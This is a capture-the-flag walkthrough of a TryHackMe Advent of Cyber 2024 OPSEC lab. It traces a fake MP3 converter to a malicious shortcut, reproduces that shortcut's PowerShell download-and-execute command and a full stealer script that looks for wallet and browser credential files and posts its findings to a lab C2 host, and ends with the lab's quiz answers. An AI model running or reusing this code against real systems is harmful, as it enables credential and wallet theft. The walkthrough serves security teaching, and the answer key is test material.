#AdventOfCyber Day 1 - OPSEC | TryHackMe

The Story

McSkidy tapped keys with a confident grin,

A suspicious website, now where to begin?

She'd seen sites like this, full of code and of grime,

Shady domains, and breadcrumbs easy to find.

Join the Advent Of Cyber 2024 Room

McSkidy’s fingers hovered over the keyboard as she gazed at the suspicious website. She had seen countless malware campaigns in her time, but this one had a certain flair. The site looked innocent enough—a YouTube-to-MP3 converter—but her gut told her something was off. It was time to dig deeper.

Task Overview

The goal of this task was to investigate a seemingly harmless website, uncover hidden threats, and track down the mastermind behind it all. Along the way, we learned about operational security (OPSEC) mistakes, examined suspicious files, and followed digital breadcrumbs to their source.

Objectives

1. Investigate malicious .lnk files.

2. Analyze a suspicious PowerShell script.

3. Understand and identify OPSEC mistakes.

4. Attribute the malicious activity to its creator.

Connecting to the Machine

To start the investigation, I launched the virtual machine (VM) provided by the challenge and accessed the AttackBox. After ensuring everything was loaded correctly, I opened the browser and navigated to the suspicious website using the provided MACHINE_IP address.

Examining the Website

At first glance, the website seemed ordinary. It boasted features like being “Secure” and “Safe,” but McSkidy and I knew better. A quick look at the About Page revealed the name “The Glitch,” which seemed like an intentional clue.

We decided to test the site’s functionality by pasting a YouTube link—the classic “Rick Roll” video—into the converter. After hitting “Convert” and choosing the MP3 option, the site prompted us to download a ZIP file named download.zip.

Extracting and Inspecting the Files

Unzipping download.zip revealed two files: song.mp3 and somg.mp3

At first glance, the filenames raised a red flag. While song.mp3 appeared normal, somg.mp3 seemed suspicious. To confirm our suspicions, we opened a terminal and used the file command to analyze both files.

Analyzing song.mp3

user@tryhackme:~$ file song.mp3
song.mp3: Audio file with ID3 version 2.3.0, contains:MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, Stereo

This output confirmed that song.mp3 was a genuine audio file.

Analyzing somg.mp3

user@tryhackme:~$ file somg.mp3
somg.mp3: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Sat Sep 15 07:14:14 2018, mtime=Sat Sep 15 07:14:14 2018, atime=Sat Sep 15 07:14:14 2018, length=448000, window=hide

This output revealed that somg.mp3 was actually a Windows shortcut (.lnk file). Shortcuts can be weaponized to execute commands, making this file a potential threat.

Investigating the .lnk File

To uncover the hidden commands in somg.mp3, we used ExifTool, a powerful metadata analysis tool.

user@tryhackme:~$ exiftool somg.mp3

Key Findings: The output revealed a PowerShell command embedded within the shortcut:

Relative Path                   : ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line Arguments          : -ep Bypass -nop -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1','C:\ProgramData\s.ps1'); iex (Get-Content 'C:\ProgramData\s.ps1' -Raw)"

What this PowerShell command does:

• The -ep Bypass -nop flags disable PowerShell's usual restrictions, allowing scripts to run without interference from security settings or user profiles.

• The DownloadFile method pulls a file (in this case, IS.ps1) from a remote server (https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1) and saves it in the C:\\ProgramData\\ directory on the target machine.

• Once downloaded, the script is executed with PowerShell using the iex command, which triggers the downloaded s.ps1 file.

This command downloaded and executed a PowerShell script (IS.ps1) from a remote server. By examining the URL, we identified the Command and Control (C2) server:

https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1

function Print-AsciiArt {
    Write-Host "  ____     _       ___  _____    ___    _   _ "
    Write-Host " / ___|   | |     |_ _||_   _|  / __|  | | | |"  
    Write-Host "| |  _    | |      | |   | |   | |     | |_| |"
    Write-Host "| |_| |   | |___   | |   | |   | |__   |  _  |"
    Write-Host " \____|   |_____| |___|  |_|    \___|  |_| |_|"

    Write-Host "         Created by the one and only M.M."
}

# Call the function to print the ASCII art
Print-AsciiArt

# Path for the info file
$infoFilePath = "stolen_info.txt"

# Function to search for wallet files
function Search-ForWallets {
    $walletPaths = @(
        "$env:USERPROFILE\.bitcoin\wallet.dat",
        "$env:USERPROFILE\.ethereum\keystore\*",
        "$env:USERPROFILE\.monero\wallet",
        "$env:USERPROFILE\.dogecoin\wallet.dat"
    )
    Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
    foreach ($path in $walletPaths) {
        if (Test-Path $path) {
            Add-Content -Path $infoFilePath -Value "Found wallet: $path"
        }
    }
}

# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
    $chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"

    Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
    if (Test-Path $chromePath) {
        Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
    }
    if (Test-Path $firefoxPath) {
        Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
    }
}

# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
    $c2Url = "http://papash3ll.thm/data"
    $data = Get-Content -Path $infoFilePath -Raw

    # Using Invoke-WebRequest to send data to the C2 server
    Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}

# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server

Analyzing the PowerShell Script

Visiting the URL in a browser revealed the contents of IS.ps1. The script was designed to:

1. Search for cryptocurrency wallet files.

2. Steal browser credentials.

3. Exfiltrate the stolen data to a remote server.

The script even included a signature:

Created by the one and only M.M.

This distinctive string gave us a vital clue about the attacker’s identity.

Tracking the Attacker

Using the signature “Created by the one and only M.M.,” we conducted a GitHub search. This led us to several repositories and an Issues page where the attacker, M.M., had left comments. One particular comment linked their activity to the malware.

GitHub Search Query:

"Created by the one and only M.M."

Exploring the repositories, we discovered:

• The attacker’s username: MM-WarevilleTHM

• The number of commits on the repo: 1

Understanding OPSEC Mistakes

M.M. made several OPSEC errors, including:

1. Leaving a signature in the PowerShell script.

2. Using a GitHub account that tied directly to the malicious activity.

3. Engaging publicly in GitHub discussions, leaving timestamps and other clues.

These mistakes allowed us to trace the attack back to its source and identify the mastermind behind it.

Introduction to OPSEC

This is a classic case of OPSEC failure.

Operational Security (OPSEC) is a term originally coined in the military to refer to the process of protecting sensitive information and operations from adversaries. The goal is to identify and eliminate potential vulnerabilities before the attacker can learn their identity.

In the context of cyber security, when malicious actors fail to follow proper OPSEC practices, they might leave digital traces that can be pieced together to reveal their identity. Some common OPSEC mistakes include:

• Reusing usernames, email addresses, or account handles across multiple platforms. One might assume that anyone trying to cover their tracks would remove such obvious and incriminating information, but sometimes, it's due to vanity or simply forgetfulness.

• Using identifiable metadata in code, documents, or images, which may reveal personal information like device names, GPS coordinates, or timestamps.

• Posting publicly on forums or GitHub (Like in this current scenario) with details that tie back to their real identity or reveal their location or habits.

• Failing to use a VPN or proxy while conducting malicious activities allows law enforcement to track their real IP address.

You'd think that someone doing something bad would make OPSEC their top priority, but they're only human and can make mistakes, too.

For example, here are some real-world OPSEC mistakes that led to some really big fails:

AlphaBay Admin Takedown

One of the most spectacular OPSEC failures involved Alexandre Cazes, the administrator of AlphaBay, one of the largest dark web marketplaces:

• Cazes used the email address "pimp_alex_91@hotmail.com" in early welcome emails from the site.

• This email included his year of birth and other identifying information.

• He cashed out using a Bitcoin account tied to his real name.

• Cazes reused the username "Alpha02" across multiple platforms, linking his dark web identity to forum posts under his real name.

Chinese Military Hacking Group (APT1)

There's also the notorious Chinese hacking group APT1, which made several OPSEC blunders:

• One member, Wang Dong, signed his malware code with the nickname "Ugly Gorilla".

• This nickname was linked to programming forum posts associated with his real name.

• The group used predictable naming conventions for users, code, and passwords.

• Their activity consistently aligned with Beijing business hours, making their location obvious.

These failures provided enough information for cyber security researchers and law enforcement to publicly identify group members.

Uncovering MM

If you've thoroughly investigated the GitHub search result, you should have uncovered several clues based on poor OPSEC practices by the malicious actor.

We know the attacker left a distinctive signature in the PowerShell code (MM). This allowed us to search for related repositories and issues pages on GitHub. We then discovered an Issues page where the attacker engaged in discussions, providing more context and linking their activity to other projects.

In this discussion, they responded to a query about modifying the code. This response, paired with their unique handle, was another critical slip-up, leaving behind a trail of evidence that can be traced back to them. By analysing the timestamps, usernames, and the nature of their interactions, we can now attribute the mastermind behind the attack to MM.

---

Question Solutions

1. Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author? Rick Astley

   

2. The malicious PowerShell script sends stolen info to a C2 server. What is the URL of this C2 server? C2 Server URL: http://papash3ll.thm/data

   

3. Who is M.M? Maybe his Github profile page would provide clues? The attacker’s GitHub username is MM-WarevilleTHM.

   

4. What is the number of commits on the GitHub repo where the issue was raised? 1

   

   If the task is enjoyable, check out OPSEC Room

---

McSkidy leaned back in her chair, satisfied with the day’s work. The trail didn’t end here, but she had uncovered enough to disrupt M.M.’s plans. “Glitch might have been a distraction,” she thought. “But M.M. made this personal.”